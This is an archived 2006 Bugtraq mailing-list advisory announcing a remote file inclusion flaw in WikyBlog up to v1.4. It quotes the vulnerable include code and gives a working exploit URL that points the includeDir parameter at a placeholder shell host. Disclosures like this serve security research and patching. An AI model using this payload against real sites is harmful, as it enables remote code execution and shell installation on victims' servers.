lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061004232844.5126.qmail@securityfocus.com> Date: 4 Oct 2006 23:28:44 -0000 From: xp1o@....com To: bugtraq@...urityfocus.com Subject: WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit #============================================================================================== #WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit #=============================================================================================== #Bug in :index.php # #Vlu Code : #-------------------------------- # # require_once($includeDir.'/wiki2.php'); # require_once($includeDir.'/wiki3.php'); # # #================================================================================================ # #Exploit : #-------------------------------- # #htpp://sitename.com/[scerpitPath]/index.php?includeDir=http://SHELLURL.COM # #================================================================================================ #Discoverd By : MoHaNdKo # #Conatact : xp1o@....com #or # wWw.xP10.CoM & wWw.TaRyaG.CoM #Greetz : r00tshell ( abo nora ) & 3abdalah & KaBaRa & mahmood_ali & ThE-WoLf-KsA # and all member on xp10.com and tryag.com ================================================================================================== vendor: http://puzzle.dl.sourceforge.net/sourceforge/wikyblog/WikyBlog-1.2.3.zip